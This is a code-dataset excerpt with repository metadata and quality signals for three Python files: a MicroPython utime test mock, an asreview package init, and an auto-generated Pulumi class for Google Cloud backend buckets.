hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3970a4d32913694232b33a4c9d12bca073bda261
| 165
|
py
|
Python
|
software/tests/mocks/utime.py
|
Allen-Synthesis/EuroPi
|
e4b5fb90ccfd387b7eb9b5e0335e34c7ebfb6194
|
[
"CC0-1.0"
] | 104
|
2021-11-07T10:00:25.000Z
|
2022-03-31T06:40:46.000Z
|
software/tests/mocks/utime.py
|
roryjamesallen/EuroPi-V2
|
e4b5fb90ccfd387b7eb9b5e0335e34c7ebfb6194
|
[
"CC0-1.0"
] | 62
|
2021-11-22T12:56:19.000Z
|
2022-03-31T14:48:43.000Z
|
software/tests/mocks/utime.py
|
roryjamesallen/EuroPi-V2
|
e4b5fb90ccfd387b7eb9b5e0335e34c7ebfb6194
|
[
"CC0-1.0"
] | 27
|
2021-11-22T23:46:49.000Z
|
2022-03-20T04:23:21.000Z
|
def sleep_ms(*args):
pass
def sleep(*args):
pass
def ticks_add(*args):
return 0
def ticks_diff(*args):
return 0
def ticks_ms():
return 0
| 8.684211
| 22
| 0.606061
| 26
| 165
| 3.692308
| 0.384615
| 0.25
| 0.229167
| 0.291667
| 0.395833
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02521
| 0.278788
| 165
| 18
| 23
| 9.166667
| 0.781513
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.2
| 0
| 0.3
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 1
| 0
|
0
| 9
|
39eafe336d66387185286ff8972c4862cb47ef82
| 86
|
py
|
Python
|
asreview/webapp/utils/__init__.py
|
openefsa/asreview
|
aec14fcad0532a3989befe577ceb369a9dbba243
|
[
"Apache-2.0"
] | null | null | null |
asreview/webapp/utils/__init__.py
|
openefsa/asreview
|
aec14fcad0532a3989befe577ceb369a9dbba243
|
[
"Apache-2.0"
] | 1
|
2020-04-16T09:01:40.000Z
|
2020-04-16T09:01:40.000Z
|
asreview/webapp/utils/__init__.py
|
openefsa/asreview
|
aec14fcad0532a3989befe577ceb369a9dbba243
|
[
"Apache-2.0"
] | 1
|
2020-03-04T12:16:53.000Z
|
2020-03-04T12:16:53.000Z
|
from asreview.webapp.utils.paths import *
from asreview.webapp.utils.project import *
| 28.666667
| 43
| 0.813953
| 12
| 86
| 5.833333
| 0.583333
| 0.342857
| 0.514286
| 0.657143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 86
| 2
| 44
| 43
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
844d34a9c635b503c83ebe24a8b772f535d57863
| 28,138
|
py
|
Python
|
sdk/python/pulumi_gcp/compute/backend_bucket.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 121
|
2018-06-18T19:16:42.000Z
|
2022-03-31T06:06:48.000Z
|
sdk/python/pulumi_gcp/compute/backend_bucket.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 492
|
2018-06-22T19:41:03.000Z
|
2022-03-31T15:33:53.000Z
|
sdk/python/pulumi_gcp/compute/backend_bucket.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 43
|
2018-06-19T01:43:13.000Z
|
2022-03-23T22:43:37.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['BackendBucketArgs', 'BackendBucket']
@pulumi.input_type
class BackendBucketArgs:
def __init__(__self__, *,
bucket_name: pulumi.Input[str],
cdn_policy: Optional[pulumi.Input['BackendBucketCdnPolicyArgs']] = None,
custom_response_headers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
enable_cdn: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a BackendBucket resource.
:param pulumi.Input[str] bucket_name: Cloud Storage bucket name.
:param pulumi.Input['BackendBucketCdnPolicyArgs'] cdn_policy: Cloud CDN configuration for this Backend Bucket.
Structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] custom_response_headers: Headers that the HTTP/S load balancer should add to proxied responses.
:param pulumi.Input[str] description: An optional textual description of the resource; provided by the
client when the resource is created.
:param pulumi.Input[bool] enable_cdn: If true, enable Cloud CDN for this BackendBucket.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and
match the regular expression `a-z?` which means
the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the
last character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
pulumi.set(__self__, "bucket_name", bucket_name)
if cdn_policy is not None:
pulumi.set(__self__, "cdn_policy", cdn_policy)
if custom_response_headers is not None:
pulumi.set(__self__, "custom_response_headers", custom_response_headers)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_cdn is not None:
pulumi.set(__self__, "enable_cdn", enable_cdn)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="bucketName")
def bucket_name(self) -> pulumi.Input[str]:
"""
Cloud Storage bucket name.
"""
return pulumi.get(self, "bucket_name")
@bucket_name.setter
def bucket_name(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket_name", value)
@property
@pulumi.getter(name="cdnPolicy")
def cdn_policy(self) -> Optional[pulumi.Input['BackendBucketCdnPolicyArgs']]:
"""
Cloud CDN configuration for this Backend Bucket.
Structure is documented below.
"""
return pulumi.get(self, "cdn_policy")
@cdn_policy.setter
def cdn_policy(self, value: Optional[pulumi.Input['BackendBucketCdnPolicyArgs']]):
pulumi.set(self, "cdn_policy", value)
@property
@pulumi.getter(name="customResponseHeaders")
def custom_response_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Headers that the HTTP/S load balancer should add to proxied responses.
"""
return pulumi.get(self, "custom_response_headers")
@custom_response_headers.setter
def custom_response_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "custom_response_headers", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional textual description of the resource; provided by the
client when the resource is created.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableCdn")
def enable_cdn(self) -> Optional[pulumi.Input[bool]]:
"""
If true, enable Cloud CDN for this BackendBucket.
"""
return pulumi.get(self, "enable_cdn")
@enable_cdn.setter
def enable_cdn(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_cdn", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and
match the regular expression `a-z?` which means
the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the
last character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class _BackendBucketState:
def __init__(__self__, *,
bucket_name: Optional[pulumi.Input[str]] = None,
cdn_policy: Optional[pulumi.Input['BackendBucketCdnPolicyArgs']] = None,
creation_timestamp: Optional[pulumi.Input[str]] = None,
custom_response_headers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
enable_cdn: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
self_link: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering BackendBucket resources.
:param pulumi.Input[str] bucket_name: Cloud Storage bucket name.
:param pulumi.Input['BackendBucketCdnPolicyArgs'] cdn_policy: Cloud CDN configuration for this Backend Bucket.
Structure is documented below.
:param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
:param pulumi.Input[Sequence[pulumi.Input[str]]] custom_response_headers: Headers that the HTTP/S load balancer should add to proxied responses.
:param pulumi.Input[str] description: An optional textual description of the resource; provided by the
client when the resource is created.
:param pulumi.Input[bool] enable_cdn: If true, enable Cloud CDN for this BackendBucket.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and
match the regular expression `a-z?` which means
the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the
last character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] self_link: The URI of the created resource.
"""
if bucket_name is not None:
pulumi.set(__self__, "bucket_name", bucket_name)
if cdn_policy is not None:
pulumi.set(__self__, "cdn_policy", cdn_policy)
if creation_timestamp is not None:
pulumi.set(__self__, "creation_timestamp", creation_timestamp)
if custom_response_headers is not None:
pulumi.set(__self__, "custom_response_headers", custom_response_headers)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_cdn is not None:
pulumi.set(__self__, "enable_cdn", enable_cdn)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
if self_link is not None:
pulumi.set(__self__, "self_link", self_link)
@property
@pulumi.getter(name="bucketName")
def bucket_name(self) -> Optional[pulumi.Input[str]]:
"""
Cloud Storage bucket name.
"""
return pulumi.get(self, "bucket_name")
@bucket_name.setter
def bucket_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "bucket_name", value)
@property
@pulumi.getter(name="cdnPolicy")
def cdn_policy(self) -> Optional[pulumi.Input['BackendBucketCdnPolicyArgs']]:
"""
Cloud CDN configuration for this Backend Bucket.
Structure is documented below.
"""
return pulumi.get(self, "cdn_policy")
@cdn_policy.setter
def cdn_policy(self, value: Optional[pulumi.Input['BackendBucketCdnPolicyArgs']]):
pulumi.set(self, "cdn_policy", value)
@property
@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> Optional[pulumi.Input[str]]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "creation_timestamp")
@creation_timestamp.setter
def creation_timestamp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "creation_timestamp", value)
@property
@pulumi.getter(name="customResponseHeaders")
def custom_response_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Headers that the HTTP/S load balancer should add to proxied responses.
"""
return pulumi.get(self, "custom_response_headers")
@custom_response_headers.setter
def custom_response_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "custom_response_headers", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional textual description of the resource; provided by the
client when the resource is created.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableCdn")
def enable_cdn(self) -> Optional[pulumi.Input[bool]]:
"""
If true, enable Cloud CDN for this BackendBucket.
"""
return pulumi.get(self, "enable_cdn")
@enable_cdn.setter
def enable_cdn(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_cdn", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and
match the regular expression `a-z?` which means
the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the
last character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> Optional[pulumi.Input[str]]:
"""
The URI of the created resource.
"""
return pulumi.get(self, "self_link")
@self_link.setter
def self_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "self_link", value)
class BackendBucket(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
bucket_name: Optional[pulumi.Input[str]] = None,
cdn_policy: Optional[pulumi.Input[pulumi.InputType['BackendBucketCdnPolicyArgs']]] = None,
custom_response_headers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
enable_cdn: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Backend buckets allow you to use Google Cloud Storage buckets with HTTP(S)
load balancing.
An HTTP(S) load balancer can direct traffic to specified URLs to a
backend bucket rather than a backend service. It can send requests for
static content to a Cloud Storage bucket and requests for dynamic content
to a virtual machine instance.
To get more information about BackendBucket, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/v1/backendBuckets)
* How-to Guides
* [Using a Cloud Storage bucket as a load balancer backend](https://cloud.google.com/compute/docs/load-balancing/http/backend-bucket)
## Example Usage
### Backend Bucket Basic
```python
import pulumi
import pulumi_gcp as gcp
image_bucket = gcp.storage.Bucket("imageBucket", location="EU")
image_backend = gcp.compute.BackendBucket("imageBackend",
description="Contains beautiful images",
bucket_name=image_bucket.name,
enable_cdn=True)
```
## Import
BackendBucket can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/backendBucket:BackendBucket default projects/{{project}}/global/backendBuckets/{{name}}
```
```sh
$ pulumi import gcp:compute/backendBucket:BackendBucket default {{project}}/{{name}}
```
```sh
$ pulumi import gcp:compute/backendBucket:BackendBucket default {{name}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] bucket_name: Cloud Storage bucket name.
:param pulumi.Input[pulumi.InputType['BackendBucketCdnPolicyArgs']] cdn_policy: Cloud CDN configuration for this Backend Bucket.
Structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] custom_response_headers: Headers that the HTTP/S load balancer should add to proxied responses.
:param pulumi.Input[str] description: An optional textual description of the resource; provided by the
client when the resource is created.
:param pulumi.Input[bool] enable_cdn: If true, enable Cloud CDN for this BackendBucket.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and
match the regular expression `a-z?` which means
the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the
last character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: BackendBucketArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Backend buckets allow you to use Google Cloud Storage buckets with HTTP(S)
load balancing.
An HTTP(S) load balancer can direct traffic to specified URLs to a
backend bucket rather than a backend service. It can send requests for
static content to a Cloud Storage bucket and requests for dynamic content
to a virtual machine instance.
To get more information about BackendBucket, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/v1/backendBuckets)
* How-to Guides
* [Using a Cloud Storage bucket as a load balancer backend](https://cloud.google.com/compute/docs/load-balancing/http/backend-bucket)
## Example Usage
### Backend Bucket Basic
```python
import pulumi
import pulumi_gcp as gcp
image_bucket = gcp.storage.Bucket("imageBucket", location="EU")
image_backend = gcp.compute.BackendBucket("imageBackend",
description="Contains beautiful images",
bucket_name=image_bucket.name,
enable_cdn=True)
```
## Import
BackendBucket can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/backendBucket:BackendBucket default projects/{{project}}/global/backendBuckets/{{name}}
```
```sh
$ pulumi import gcp:compute/backendBucket:BackendBucket default {{project}}/{{name}}
```
```sh
$ pulumi import gcp:compute/backendBucket:BackendBucket default {{name}}
```
:param str resource_name: The name of the resource.
:param BackendBucketArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(BackendBucketArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
bucket_name: Optional[pulumi.Input[str]] = None,
cdn_policy: Optional[pulumi.Input[pulumi.InputType['BackendBucketCdnPolicyArgs']]] = None,
custom_response_headers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
enable_cdn: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = BackendBucketArgs.__new__(BackendBucketArgs)
if bucket_name is None and not opts.urn:
raise TypeError("Missing required property 'bucket_name'")
__props__.__dict__["bucket_name"] = bucket_name
__props__.__dict__["cdn_policy"] = cdn_policy
__props__.__dict__["custom_response_headers"] = custom_response_headers
__props__.__dict__["description"] = description
__props__.__dict__["enable_cdn"] = enable_cdn
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["creation_timestamp"] = None
__props__.__dict__["self_link"] = None
super(BackendBucket, __self__).__init__(
'gcp:compute/backendBucket:BackendBucket',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
bucket_name: Optional[pulumi.Input[str]] = None,
cdn_policy: Optional[pulumi.Input[pulumi.InputType['BackendBucketCdnPolicyArgs']]] = None,
creation_timestamp: Optional[pulumi.Input[str]] = None,
custom_response_headers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
enable_cdn: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
self_link: Optional[pulumi.Input[str]] = None) -> 'BackendBucket':
"""
Get an existing BackendBucket resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] bucket_name: Cloud Storage bucket name.
:param pulumi.Input[pulumi.InputType['BackendBucketCdnPolicyArgs']] cdn_policy: Cloud CDN configuration for this Backend Bucket.
Structure is documented below.
:param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
:param pulumi.Input[Sequence[pulumi.Input[str]]] custom_response_headers: Headers that the HTTP/S load balancer should add to proxied responses.
:param pulumi.Input[str] description: An optional textual description of the resource; provided by the
client when the resource is created.
:param pulumi.Input[bool] enable_cdn: If true, enable Cloud CDN for this BackendBucket.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and
match the regular expression `a-z?` which means
the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the
last character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] self_link: The URI of the created resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _BackendBucketState.__new__(_BackendBucketState)
__props__.__dict__["bucket_name"] = bucket_name
__props__.__dict__["cdn_policy"] = cdn_policy
__props__.__dict__["creation_timestamp"] = creation_timestamp
__props__.__dict__["custom_response_headers"] = custom_response_headers
__props__.__dict__["description"] = description
__props__.__dict__["enable_cdn"] = enable_cdn
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["self_link"] = self_link
return BackendBucket(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="bucketName")
def bucket_name(self) -> pulumi.Output[str]:
"""
Cloud Storage bucket name.
"""
return pulumi.get(self, "bucket_name")
@property
@pulumi.getter(name="cdnPolicy")
def cdn_policy(self) -> pulumi.Output['outputs.BackendBucketCdnPolicy']:
"""
Cloud CDN configuration for this Backend Bucket.
Structure is documented below.
"""
return pulumi.get(self, "cdn_policy")
@property
@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> pulumi.Output[str]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "creation_timestamp")
@property
@pulumi.getter(name="customResponseHeaders")
def custom_response_headers(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Headers that the HTTP/S load balancer should add to proxied responses.
"""
return pulumi.get(self, "custom_response_headers")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
An optional textual description of the resource; provided by the
client when the resource is created.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="enableCdn")
def enable_cdn(self) -> pulumi.Output[Optional[bool]]:
"""
If true, enable Cloud CDN for this BackendBucket.
"""
return pulumi.get(self, "enable_cdn")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and
match the regular expression `a-z?` which means
the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the
last character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> pulumi.Output[str]:
"""
The URI of the created resource.
"""
return pulumi.get(self, "self_link")
| 44.242138
| 152
| 0.648944
| 3,324
| 28,138
| 5.326113
| 0.076414
| 0.074559
| 0.062472
| 0.050949
| 0.887088
| 0.868335
| 0.858507
| 0.851728
| 0.848848
| 0.824164
| 0
| 0.004265
| 0.258441
| 28,138
| 635
| 153
| 44.311811
| 0.844196
| 0.413569
| 0
| 0.740741
| 1
| 0
| 0.109469
| 0.039575
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161616
| false
| 0.003367
| 0.023569
| 0
| 0.282828
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8455373fa244c05e161806267cbc1d6a574f01c6
| 23,530
|
py
|
Python
|
tools/paper_test.py
|
huaer9258/SRDN
|
e5cfec029942088523550cc62f47e6f6519a6474
|
[
"MIT"
] | 3
|
